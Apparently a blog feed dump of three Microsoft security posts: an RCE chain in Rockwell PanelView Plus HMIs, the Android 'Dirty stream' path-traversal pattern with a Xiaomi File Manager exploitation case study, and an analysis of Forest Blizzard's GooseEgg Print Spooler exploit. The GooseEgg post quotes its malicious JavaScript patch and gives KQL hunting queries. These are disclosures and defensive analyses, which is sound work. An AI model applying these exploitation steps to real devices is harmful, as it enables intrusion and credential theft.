According to Rockwell Automation’s online resources, PanelView Plus HMIs operate on the Windows 10 IoT (or Windows CE for older versions) operating system. We were able to extract the DLLs and executables related to Rockwell Automation from the most recent firmware. There are several DLLs responsible for receiving different Class IDs and processing their requests, one of which is responsible for processing the Class ID we observed in the packet capture.

Screenshot of registry query data from CIP
Figure 3 Registry query by data from CIP

Upon examining the functionality associated with this Class ID, we confirmed that it is indeed responsible for querying the registry and sending the value in the response. However, we also discovered that the code managing this functionality performs input verification, allowing the reading of registry values only from specific Rockwell keys.

Potentially exploitable custom class

Although our initial hypothesis was proven incorrect, this finding allowed us to gain valuable insights into Rockwell’s process of handling different CIP classes. Additionally, we learned how to identify the classes that a specific DLL is responsible for processing. This knowledge leads us to our second hypothesis: there might be another custom class, managed by the same DLL as the one responsible for the registry class, that could be exploited to gain remote control of the device.

Remote code execution

We began analyzing the DLL that handles the custom CIP class for reading and writing registry keys and discovered that this DLL also manages two other undocumented custom CIP classes from Rockwell. We decided to investigate these classes further to determine if they could be exploited for our attack and help validate our hypothesis.

Custom class 1

The first class we examined had an intriguing functionality: it accepts a path to a DLL file, a function name, and a third parameter as input. It then loads the DLL using LoadLibrary and calls the specified function using GetProcAddress, passing the third parameter as an argument.

Screenshot of LoadLibrary
Figure 4 LoadLibrary based on CIP data

This seemed like a possible avenue for executing arbitrary code. However, there was a catch: the class included a verification function that checked if the DLL name was remotehelper.dll and if the function name was one of the predefined values. If these conditions were not met, the class would return an error and not execute the function.

Custom class 2

Next, we examined the second class found within the same DLL. This class allowed reading and writing files on the device. It also included a verification function, but it was more permissive: it only checked whether the path for reading/writing began with a specific string. We realized that this class could potentially be exploited by uploading a malicious DLL to the device and place it in almost any location.

Exploitation approach

Having gained a comprehensive understanding of the vulnerabilities, we had an idea of how an attacker could utilize the two custom classes to launch code remotely on the device. The idea was to compile a DLL compatible with Windows 10 IoT, the operating system of the device. This DLL would contain the code we wanted to run on the device and would be exported under the name GetVersion, which is one of the valid function names that can be invoked by custom class 1. We would then use custom class 2 to upload our DLL to the device, placing it in a random folder and naming it remotehelper.dll. Finally, we would execute it using custom class 1.

Diagram showing the exploitation approach, from compiling malicious DLL, uploading the DLL using custom class 2, and invoking the DLL using custom class 1
Figure 5. Exploitation approach

To further explore how the vulnerability can be exploited, we decided to leverage an existing function in the original remotehelper.dll file. We discovered that this file had an export called InvokeExe, which allowed running any executable file on the device. However, this function was not in the list of valid function names for custom class 1, so we could not use it directly. To overcome this obstacle, we patched the remotehelper.dll file and altered one of the valid export names to point to the InvokeExe function. We then uploaded our patched DLL to the device, placing it in a different folder than the original. Subsequently, we used custom class 1 to invoke our patched DLL and run cmd.exe, which granted us a command shell on the device. We confirmed that the exploit was successful and that we had gained full control of the device.

Diagram showing the exploit POC using the exploitation approach we described in this blog
Figure 6. Exploit PoC

Mitigation and protection guidance

Microsoft recommends the following measures to help protect organizations from attacks that take advantage of the PanelView Plus vulnerabilities shared in this blog post:

To assist with identifying impacted devices, Microsoft released a tool for scanning and performing forensics investigation on Rockwell Rslogix devices as part of its arsenal of open-source tools available on GitHub.

Microsoft Defender for IoT detections

Microsoft Defender for IoT provides the following protection measures against these vulnerabilities, associated exploits, and other malicious behavior:  

  • Defender for IoT detects and classifies devices that use CIP.  
  • Defender for IoT raises alerts on unauthorized access to devices using CIP, and abnormal behavior in these devices.  
  • Defender for IoT raises alerts if a threat actor attempts to exploit these vulnerabilities. Alert type: “Suspicion of Malicious Activity”.

Yuval Gordon
Microsoft Threat Intelligence Community

References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Vulnerabilities in PanelView Plus devices could lead to remote code execution appeared first on Microsoft Security Blog.

]]>
“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps http://approjects.co.za/?big=en-us/security/blog/2024/05/01/dirty-stream-attack-discovering-and-mitigating-a-common-vulnerability-pattern-in-android-apps/ Wed, 01 May 2024 18:00:00 +0000 Microsoft discovered a vulnerability pattern in multiple popular Android applications that could enable a malicious application to overwrite files in the vulnerable application’s internal data storage directory, which could lead to arbitrary code execution and token theft, among other impacts. We have shared our findings with Google’s Android Application Security Research team, as well as the developers of apps found vulnerable to this issue. We anticipate that the vulnerability pattern could be found in other applications. We’re sharing this research more broadly so developers and publishers can check their apps for similar issues, fix as appropriate, and prevent them from being introduced into new apps or releases.

The post “Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps appeared first on Microsoft Security Blog.

]]>
Microsoft discovered a path traversal-affiliated vulnerability pattern in multiple popular Android applications that could enable a malicious application to overwrite files in the vulnerable application’s home directory. The implications of this vulnerability pattern include arbitrary code execution and token theft, depending on an application’s implementation. Arbitrary code execution can provide a threat actor with full control over an application’s behavior. Meanwhile, token theft can provide a threat actor with access to the user’s accounts and sensitive data.

We identified several vulnerable applications in the Google Play Store that represented over four billion installations. We anticipate that the vulnerability pattern could be found in other applications. We’re sharing this research so developers and publishers can check their apps for similar issues, fix as appropriate, and prevent introducing such vulnerabilities into new apps or releases.  As threats across all platforms continue to evolve, industry collaboration among security researchers, security vendors, and the broader security community is essential in improving security for all. Microsoft remains committed to working with the security community to share vulnerability discoveries and threat intelligence to protect users across platforms.

After discovering this issue, we identified several vulnerable applications. As part of our responsible disclosure policy, we notified application developers through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) and worked with them to address the issue. We would like to thank the Xiaomi, Inc. and WPS Office security teams for investigating and fixing the issue. As of February 2024, fixes have been deployed for the aforementioned apps, and users are advised to keep their device and installed applications up to date.

Recognizing that more applications could be affected, we acted to increase developer awareness of the issue by collaborating with Google to publish an article on the Android Developers website, providing guidance in a high-visibility location to help developers avoid introducing this vulnerability pattern into their applications. We also wish to thank Google’s Android Application Security Research team for their partnership in resolving this issue.

In this blog post, we continue to raise developer and user awareness by giving a general overview of the vulnerability pattern, and then focusing on Android share targets, as they are the most prone to these types of attacks. We go through an actual code execution case study where we demonstrate impact that extends beyond the mobile device’s scope and could even affect a local network. Finally, we provide guidance to users and application developers and illustrate the importance of collaboration to improve security for all.

Overview: Data and file sharing on Android

The Android operating system enforces isolation by assigning each application its own dedicated data and memory space. To facilitate data and file sharing, Android provides a component called a content provider, which acts as an interface for managing and exposing data to the rest of the installed applications in a secure manner. When used correctly, a content provider provides a reliable solution. However, improper implementation can introduce vulnerabilities that could enable bypassing of read/write restrictions within an application’s home directory.

The Android software development kit (SDK) includes the FileProvider class, a subclass of ContentProvider that enables file sharing between installed applications. An application that needs to share its files with other applications can declare a FileProvider in its app manifest and declare the specific paths to share.

Every file provider has a property called authority, which identifies it system-wide, and can be used by the consumer (the app that wants to access the shared files) as a form of address. This content-based model bears a strong resemblance to the web model, but instead of the http scheme, consumers utilize the content scheme along with the authority, followed by a pseudo-path to the file that they want to access.

For example, assuming that the application com.example.server shares some files under the file:///data/data/com.example.server/fileshttps://www.microsoft.com/images directory that it has previously declared as shared using the name shared_images, a consumer can use the content://[authority]/shared_images/[sub-path]/[filename] URI to index these files.

Access is given by the data sharing application most commonly using the grantUriPermissions attribute of the Android manifest, in combination with special flags that are used to define a read or write mode of operation. The data sharing application creates and sends an intent to the consumer that provides temporary fine-grained access to a file.  Finally, when a provider receives a file access request, it resolves the actual file path that corresponds to the incoming URI and returns a file descriptor to it.  

Implementation pitfalls

This content provider-based model provides a well-defined file-sharing mechanism, enabling a serving application to share its files with other applications in a secure manner with fine-grained control. However, we have frequently encountered cases where the consuming application doesn’t validate the content of the file that it receives and, most concerning, it uses the filename provided by the serving application to cache the received file within the consuming application’s internal data directory. If the serving application implements its own malicious version of FileProvider, it may be able to cause the consuming application to overwrite critical files.

Share targets

In simple terms, a share target is an Android app that declares itself to handle data and files sent by other apps. Common application categories that can be share targets include mail clients, social networking apps, messaging apps, file editors, browsers, and so on. In a common scenario, when a user clicks on a file, the Android operating system triggers the share-sheet dialog asking the user to select the component that the file should be sent to:

Android share sheet dialog displaying apps such as OneDrive, OneNote, Outlook, and others.
Figure 1. The Android share sheet dialog

While this type of guided file-sharing interaction itself may not trigger a successful attack against a share target, a malicious Android application can create a custom, explicit intent and send a file directly to a share target with a malicious filename and without the user’s knowledge or approval. Essentially, the malicious application is substituting its own malicious FileProvider implementation and provides a filename that is improperly trusted by the consuming application.

Diagram displaying the distry stream attack steps between the malicious app and a share target APK. First, the request to process file is sent to the APK, which replies with a request for the file name. The malicious app replies with the name, the APK allows it, granting the malicious app the ability to deliver the final malicious payload.
Figure 2. Dirty stream attack

In Figure 2, the malicious app, on the left, creates an explicit intent that targets the file processing component of the share target, on the right, and attaches a content URI as an intent’s extra. It then sends this intent to the share target using the startActivity API call.

After this point, most of the share targets that we have reviewed seem to follow a specific code pattern that includes the following steps:

  1. Request the actual filename from the remote file provider
  2. Use this filename to initialize a file that is subsequently used to initialize a file output stream
  3. Create an input stream using the incoming content URI
  4. Copy the input stream to the output stream

Since the rogue app controls the name as well as the content of the file, by blindly trusting this input, a share target may overwrite critical files in its private data space, which may lead to serious consequences.

Impact

We identified this vulnerability pattern in the then-current versions of several Android applications published on the Google Play Store, including at least four with more than 500 million installations each. In each case, we responsibly disclosed to the vendor. Two example vulnerable applications that we identified are Xiaomi Inc.’s File Manager (1B+ installs) and WPS Office (500M+ installs).

In Xiaomi Inc.’s File Manager, we were able to obtain arbitrary code execution in version V1-210567. After our disclosure, Xiaomi published version V1-210593, and we verified that the vulnerability has been addressed. In WPS Office, we were able to obtain arbitrary code execution in version 16.8.1. After our disclosure, WPS published and informed us that the vulnerability has been addressed as of version 17.0.0.

The potential impact varies depending on implementation specifics. For example, it’s very common for Android applications to read their server settings from the shared_prefs directory. In such cases, the malicious app can overwrite these settings, causing the vulnerable app to communicate with an attacker-controlled server and send the user’s authentication tokens or other sensitive information.

In a worst-case (and not so uncommon) scenario, the vulnerable application might load native libraries from its data directory (as opposed to the more secure /data/app-lib directory, where the libraries are protected from modification). In this case, the malicious application can overwrite a native library with malicious code that gets executed when the library is loaded. In the following section, we use Xiaomi Inc.’s File Manager to illustrate this case. We demonstrated the ability for a malicious application to overwrite the application’s shared preferences, write a native library to the application’s internal storage, and cause the application to load the library. These actions provided arbitrary code execution with the file manager’s user ID and permissions.

In the following sections, we focus on this case and delve into the technical details of this vulnerability pattern.

Case study: Xiaomi Inc.’s File Manager

Xiaomi Inc.’s File Manager is the default file manager application for Xiaomi devices and is published under the package name com.mi.android.globalFileexplorer on the Google Play Store, where it has been installed over one billion times.

Xiaomi’s File Manager profile according to Android rank
Figure 3. Xiaomi’s File Manager profile according to Android rank (source: File Manager)

Besides having full access to the device’s external storage, the application requests many permissions, including the ability to install other applications:

Screenshot of code displaying the app's permissions
Figure 4. A snapshot of the application’s permissions

Further, it offers a junk files cleaner plugin as well as the ability to connect to remote FTP and SMB shares:

Screenshot of using the file manager to connect to remote shares.
Figure 5. Connecting to remote shares using the file manager

Vulnerability assessment findings

During our investigation, we identified that the application exports the CopyFileActivity, an activity alias of the com.android.fileexplorer.activity.FileActivity, which is used to handle copy-from-to file operations:

Screenshot of the copy to CopyFileActivity event.
Figure 6. Triggering the copy to CopyFileActivity

Since this activity is exported, it can be triggered by any application installed on the same device by using an explicit intent of action SEND or SEND_MULTIPLE and attaching a content URI corresponding to a file stream.

Upon receiving such an intent, the browser performs a validity check, which we found to be insufficient:

Screenshot of code displaying the steps for validating an incoming copy file request.
Figure 7. Validating an incoming copy file request

As depicted above, the initCopyOrMoveIntent method calls the checkValid method passing as an argument a content URI (steps 1 and 2). However, the checkValid method is designed to handle a file path, not a content URI. It always returns true for a content URI. Instead, a safer practice is to parse the string as a URI, including ensuring the scheme is the expected value (in this case, file, not content).The checkValid method verifies that the copy or move operation doesn’t affect the private directory of the app, by initializing a file object using the incoming string as an argument to the File class constructor and comparing its canonical path with the path that corresponds to the home directory of the application (steps 3 and 4). Given a content URI as a path, the File constructor normalizes it (following a Unix file system normalization), thus the getCanonicalPath method returns a string starting with “/content:/“, which will always pass the validity check. More specifically, the app performs a query to the remote content provider for the _size, _display_name and _data columns (see line 48 below). Then it uses the values returned by these rows to initialize the fields of an object of the com.android.fileexplorer.mode.c class:

Screenshot of code getting file metadata from the remote content provider.
Figure 8. Getting file metadata from the remote content provider

Given the case that the _display_name and _data values, returned from the external file provider, are relative paths to the destination directory, after exiting from the method above, these class fields will contain values like the ones depicted below:

Screenshot of code displaying the file model initialized after calling method a
Figure 9. The file model initialized after calling the method a

As shown above, the paths (variables d and e) of this file-model point to files within the home directory of the application, thus the file streams attached to the incoming intent are going to be written under the specific locations.

Getting code execution

As previously mentioned, the application uses a plugin to clean the device’s junk files:

Screenshot of the junk files cleaner plugin user interface
Figure 10. The junk files cleaner plugin user interface

When the application loads this plugin, it makes use of two native libraries: libixiaomifileu.so, which fetches from the /data/app directory, and libixiaomifileuext.so from the home directory:

Screenshot of code displaying the loaded native libraries traced using medusa
Figure 11. Tracing the loaded native libraries using medusa

As apps don’t have write access to the /data/app folder, the libixiaomifileu.so file stored there cannot be replaced. The easiest way to get code execution is to replace the libixiaomifileuext.so with a malicious one. However, an attempt to do so would fail since in this particular case, the vulnerability that we described can only be used to write new files within the home directory, not overwrite existing files. Our next inquiry was to determine how the application loads the libixiaomifileu.so.

Our assessment showed that before the application loads this library, it follows the following steps:

  1. Calculate the hash of the file libixiaomifileu.so, located in the /data/app directory
  1. Compare this hash with the value assigned to the “libixiaomifileu.so_hm5” string, fetched from the com.mi.android.globalFileexprorer_preferences.xml file
Screenshot of code displaying the com.mi.android.globalFileexprorer_preferences.xml
Figure 12. the com.mi.android.globalFileexprorer_preferences.xml
  1. If the values don’t match, search for the libixiaomifileu.so file in the /files/lib path in the home directory
  1. If the file is found there, calculate its hash and compare it again with the value from the shared_preferences folder
  1. If the hashes match, load the file under the /files/lib using the System.load method

Given this behavior, in order to get code execution with the file manager’s user ID, an attacker must take the following steps:

  1. Use the path traversal vulnerability to save a malicious library as /files/lib/libixiaomifileu.so (the file does not already exist in that directory, so overwriting is not an issue)
  1. Calculate the hash of this library to replace the value of the libixiaomifileu.so_hm5 string
  1. Trigger the junk cleaner plugin with an explicit intent, since the activity that loads the native libraries is exported

An acute reader might have noticed that the second step requires the attacker to force the browser to overwrite the com.mi.android.globalFileexprorer_preferences.xml, which, as we already mentioned, was not possible.

To overcome this restriction, we referred to the actual implementation of the SharedPreferences class, where we found that when an Android application uses the getSharedPreferences API method to retrieve an instance of the SharedPreferences class, giving the name of the shared preferences file as an argument, then the constructor of the SharedPreferencesImpl class performs the following steps:

  1. Create a new file object using the name provided to the getSharedPreferences method, followed by the .xml extension, followed by the .bak extension
  1. Check if this file exists, and in case it does, delete the original xml file and replace it with the one created in the first step

Through this behavior, we were able to save the com.mi.android.globalFileexprorer_preferences.xml.bak under the shared preferences folder (as during the application’s runtime it is unlikely to exist), so when the app tried to verify the hash, the original xml file was already replaced by our own copy. After this point, by using a single intent to start the junk cleaner plugin, we were able to trick the application to load the malicious library instead of the one under the /data/app folder and get code execution with the browser’s user ID.

Impact

One reason we chose to use this app as a showcase is because the impact extends beyond the user’s mobile device. The application gives the option to connect to remote file shares using the FTP and SMB protocols and the user credentials are saved in clear text in the /data/data/com.mi.android.globalFileexplorer/files/rmt_i.properties file:

Screenshot of code displaying the SMB or FTP credentials being saved in clear text
Figure 13. SMB/FTP credentials saved in clear text

If a third party app was able to exploit this vulnerability and obtain code execution, an attacker could retrieve these credentials. The impact would then extend even further, since by the time that a user requests to open a remote share, the browser creates the directory /sdcard/Android/data/com.mi.android.globalFileexplorer/files/usbTemp/ where it saves the files that the user retrieves:

Screenshot of code displaying the SMB shared files saved in the external storage
Figure 14. SMB shared files, saved in the external storage

This means that a remote attacker would be able to read or write files to SMB shares of a local network, assuming that the device was connected to it. The same stands for FTP shares as they are handled exactly in the same way:

Screenshot of code displaying the FTP shared files saved in the external storage
Figure 15. FTP shared files, saved in the external storage

In summary, the exploitation flow is depicted in the figure below:

Diagram displaying how the attacker obtains remote access to local shares, as further detailed in text.
Figure 16. Getting remote access to local shares

In step 1, the user opens a malicious app that may pose as a file editor, messaging app, mail client, or any app in general and request the user to save a file. By the time that the user attempts to save such a file, no matter what destination path they choose to save it, the malicious app forces the file browser app to write it under its internal /files/lib folder. Then, the malicious app can start the junk cleaner using an explicit intent (no user interaction is required) and this will lead to code execution with the browser’s ID (step 2).

In step 3, the attacker uses the arbitrary code execution capability to retrieve the SMB and FTP credentials from the rmt_i.properties file. Subsequently, the attacker can now jump to step 5 and access the shares directly using the stolen credentials. Alternatively, after retrieving the share credentials, the mobile device can connect to a local network (step 4) and access an SMB or FTP share, allowing the attacker to access the shared files through the /sdcard/Android/data/com.mi.android.globalFileexplorer/files/usbTemp/ folder (step 5).

Recommendations

Recognizing that this vulnerability pattern may be widespread, we shared our findings with Google’s Android Application Security Research team. We collaborated with Google to author guidance for Android application developers to help them recognize and avoid this pattern. We recommend developers and security analysts familiarize themselves with the excellent Android application security guidance provided by Google as well as make use of the Android Lint tool included with the Android SDK and integrated with Android Studio (supplemented with Google’s additional security-focused checks) to identify and avoid potential vulnerabilities. GitHub’s CodeQL also provides capabilities to identify vulnerabilities.

To prevent these issues, when handling file streams sent by other applications, the safest solution is to completely ignore the name returned by the remote file provider when caching the received content. Some of the most robust approaches we encountered use randomly generated names, so even in the case that the content of an incoming stream is malformed, it won’t tamper with the application.

In cases where such an approach is not feasible, developers need to take extra steps to ascertain that the cached file is written to a dedicated directory. As an incoming file stream is usually identified by a content URI, the first step is to reliably identify and sanitize the corresponding filename. Besides filtering characters that may lead to a path traversal and before performing any write operation, developers must verify that the cached file is within the dedicated directory by performing a call to the File.getCanonicalPath and validating the prefix of the returned value.

Another area to safeguard is in the way developers try to extract a filename from a content URI. Developers often use Uri.getLastPathSegment(), which returns the (URL) decoded value of the last path URI segment. An attacker can craft a URI with URL encoded characters within this segment, including characters used for path traversal. Using the returned value to cache a file can again render the application vulnerable to this type of attack.

For end users, we recommend keeping mobile applications up to date through the Google Play Store (or other appropriate trusted source) to ensure that updates addressing known vulnerabilities are installed. Users should only install applications from trusted sources to avoid potentially malicious applications. We recommend users who accessed SMB or FTP shares through the Xiaomi app before updates to reset credentials and to investigate for any anomalous behavior. Microsoft Defender for Endpoint on Android can alert users and enterprises to malicious applications, and Microsoft Defender Vulnerability Management can identify installed applications with known vulnerabilities.

Dimitrios Valsamaras

Microsoft Threat Intelligence

References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post “Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps appeared first on Microsoft Security Blog.

]]>
Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials http://approjects.co.za/?big=en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ Mon, 22 Apr 2024 16:00:00 +0000 Since 2019, Forest Blizzard has used a custom post-compromise tool to exploit a vulnerability in the Windows Print Spooler service that allows elevated permissions. Microsoft has issued a security update addressing this vulnerability as CVE-2022-38028.

The post Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials appeared first on Microsoft Security Blog.

]]>
Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks. Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations. While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks.

Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as CVE-2023-23397. Linked to the Russian General Staff Main Intelligence Directorate (GRU) by the United States and United Kingdom governments, Forest Blizzard primarily focuses on strategic intelligence targets and differs from other GRU-affiliated and sponsored groups, which Microsoft has tied to destructive attacks, such as Seashell Blizzard (IRIDIUM) and Cadet Blizzard (DEV-0586). Although Russian threat actors are known to have exploited a set of similar vulnerabilities known as PrintNightmare (CVE-2021-34527 and CVE-2021-1675), the use of GooseEgg in Forest Blizzard operations is a unique discovery that had not been previously reported by security providers. Microsoft is committed to providing visibility into observed malicious activity and sharing insights on threat actors to help organizations protect themselves. Organizations and users are to apply the CVE-2022-38028 security update to mitigate this threat, while Microsoft Defender Antivirus detects the specific Forest Blizzard capability as HackTool:Win64/GooseEgg.

This blog provides technical information on GooseEgg, a unique Forest Blizzard capability. In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities. We also provide additional recommendations, detections, and indicators of compromise. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their accounts.

Who is Forest Blizzard?

Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East. Microsoft has also observed Forest Blizzard targeting media, information technology, sports organizations, and educational institutions worldwide. Since at least 2010, the threat actor’s primary mission has been to collect intelligence in support of Russian government foreign policy initiatives. The United States and United Kingdom governments have linked Forest Blizzard to Unit 26165 of the Russian Federation’s military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Other security researchers have used GRU Unit 26165, APT28, Sednit, Sofacy, and Fancy Bear to refer to groups with similar or related activities.

GooseEgg

Microsoft Threat Intelligence assesses Forest Blizzard’s objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information. While this actor’s TTPs and infrastructure specific to the use of this tool can change at any time, the following sections provide additional details on Forest Blizzard tactics, techniques, and procedures (TTPs) in past compromises.

Launch, persistence, and privilege escalation

Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. GooseEgg is typically deployed with a batch script, which we have observed using the name execute.bat and doit.bat. This batch script writes the file servtask.bat, which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run servtask.bat.

Screenshot of the batch file code
Figure 1. Batch file

The GooseEgg binary—which has included but is not limited to the file names justice.exe and DefragmentSrv.exe—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity.

The first command issues a custom return code 0x6009F49F and exits; which could be indicative of a version number. The next two commands trigger the exploit and launch either a provided dynamic-link library (DLL) or executable with elevated permissions. The fourth and final command tests the exploit and checks that it has succeeded using the whoami command.

Microsoft has observed that the name of an embedded malicious DLL file typically includes the phrase “wayzgoose”; for example, wayzgoose23.dll. This DLL, as well as other components of the malware, are deployed to one of the following installation subdirectories, which is created under C:\ProgramData. A subdirectory name is selected from the list below:

  • Microsoft
  • Adobe
  • Comms
  • Intel
  • Kaspersky Lab
  • Bitdefender
  • ESET
  • NVIDIA
  • UbiSoft
  • Steam

A specially crafted subdirectory with randomly generated numbers and the format string \v%u.%02u.%04u is also created and serves as the install directory. For example, a directory that looks like C:\ProgramData\Adobe\v2.116.4405 may be created. The binary then copies the following driver stores to this directory:

  • C:\Windows\System32\DriverStore\FileRepository\pnms003.inf_*
  • C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_*
Screenshot of code depicting the GooseEgg binary adding driver stores to an actor-controlled directory
Figure 2. GooseEgg binary adding driver stores to an actor-controlled directory

Next, registry keys are created, effectively generating a custom protocol handler and registering a new CLSID to serve as the COM server for this “rogue” protocol. The exploit replaces the C: drive symbolic link in the object manager to point to the newly created directory. When the PrintSpooler attempts to load C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_amd64_a7412a554c9bc1fd\MPDW-Constraints.js, it instead is redirected to the actor-controlled directory containing the copied driver packages.

Screenshot of the registry key creation code
Figure 3. Registry key creation
Screenshot of the C: drive symbolic link hijack code
Figure 4. C: drive symbolic link hijack

The “MPDW-constraints.js” stored within the actor-controlled directory has the following patch applied to the convertDevModeToPrintTicket function:

function convertDevModeToPrintTicket(devModeProperties, scriptContext, printTicket)
{try{ printTicket.XmlNode.load('rogue9471://go'); } catch (e) {}

The above patch to the convertDevModeToPrintTicket function invokes the “rogue” search protocol handler’s CLSID during the call to RpcEndDocPrinter. This results in the auxiliary DLL wayzgoose.dll launching in the context of the PrintSpooler service with SYSTEM permissions. wayzgoose.dll is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code.

Recommendations

Microsoft recommends the following mitigations defend against attacks that use GooseEgg.

Reduce the Print Spooler vulnerability

Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on October 11, 2022 and updates for PrintNightmare vulnerabilities on June 8, 2021 and July 1, 2021. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security. In addition, since the Print Spooler service isn’t required for domain controller operations, Microsoft recommends disabling the service on domain controllers. Otherwise, users can install available Windows security updates for Print Spooler vulnerabilities on Windows domain controllers before member servers and workstations. To help identify domain controllers that have the Print Spooler service enabled, Microsoft Defender for Identity has a built-in security assessment that tracks the availability of Print Spooler services on domain controllers.

Be proactively defensive

  • For customers, follow the credential hardening recommendations in our on-premises credential theft overview to defend against common credential theft techniques like LSASS access.
  • Run Endpoint Detection and Response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.    
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.

Microsoft Defender XDR customers can turn on the following attack surface reduction rule to prevent common attack techniques used for GooseEgg. Microsoft Defender XDR detects the GooseEgg tool and raises an alert upon detection of attempts to exploit Print Spooler vulnerabilities regardless of whether the device has been patched.

Detecting, hunting, and responding to GooseEgg

Microsoft Defender XDR detections

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

  • HackTool:Win64/GooseEgg

Microsoft Defender for Endpoint

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • Possible exploitation of CVE-2021-34527
  • Possible source of PrintNightmare exploitation
  • Possible target of PrintNightmare exploitation attempt
  • Potential elevation of privilege using print filter pipeline service
  • Suspicious behavior by spoolsv.exe
  • Forest Blizzard Actor activity detected

Microsoft Defender for Identity

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • Suspected Windows Print Spooler service exploitation attempt (CVE-2021-34527 exploitation)

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Hunting queries

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

Hunt for filenames, file extensions in ProgramData folder and file hash

let filenames = dynamic(["execute.bat","doit.bat","servtask.bat"]);
DeviceFileEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "FileCreated"
  | where FolderPath == "C:\\ProgramData\\"
  | where FileName in~ (filenames) or FileName endswith ".save" or FileName endswith ".zip" or ( FileName startswith "wayzgoose" and FileName endswith ".dll") or SHA256 == "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9" // hash value of execute.bat/doit.bat/servtask.bat
  | project TimeGenerated, DeviceId, DeviceName, ActionType, FolderPath, FileName, InitiatingProcessAccountName,InitiatingProcessAccountUpn

Hunt for processes creating scheduled task creation

DeviceProcessEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where InitiatingProcessSHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" //hash value of justice.exe
